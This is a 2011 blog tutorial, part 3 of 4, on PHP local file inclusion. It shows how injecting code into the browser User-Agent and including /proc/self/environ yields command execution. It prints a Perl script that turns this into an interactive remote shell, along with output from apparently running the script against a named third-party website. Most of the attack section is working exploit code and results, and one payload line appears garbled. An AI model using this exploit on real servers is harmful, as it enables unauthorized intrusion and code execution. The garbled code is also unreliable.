Thursday, September 29, 2011

Local File Inclusion Tutorial Part 3 of 4

LFI Technique

When a request to a php page is made, apache forks (creating a new proccess) and exec' the php binary to actually run/interpret the php script. As in every *nix system each process that runs, has it's own /proc entry, it can be quite useful to us, since it holds a lot information about the process and the enviroment where it is running.

More specifically, the file /proc/self/environ of a php process running has something like this:
Code:
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin�
SERVER_ADMIN=webmaster@this.domain�
(...)
(X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 Gentoo�HTTP_KEEP_ALIVE=300�
(...)
That "Gentoo" is actually part of the userAgent of my browser. So guess what...
imagine that we change the userAgent of the browser to and make a request like:
Code:
http://somesite.com/index.php?file=../../../../../proc/self/environ
you guessed right. it works Smile the php system is actually executed Smile

So, after coding this little perl script
Code:
#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];
my ($line,$response);
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

print "jcfsprompt: ";
while( $line = ) {
chop($line);
$browser->agent("jcfs /dev/stdout");?>jcfs");
$response = $browser->get( $url );
if ($response->content =~ /jcfs(.*)jcfs/s) {
print $1;
}
print "jcfsprompt: ";
}
I tried something like this...

Code:
jcfs@heaven ~/boxes $ perl lfi.pl http://www.fastfrags.co.uk/index.php?page=
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
2.6.15-1.2054_FC5
jcfsprompt: pwd
/home/fastfr00/public_html
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin
(...)

2 comments:

Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security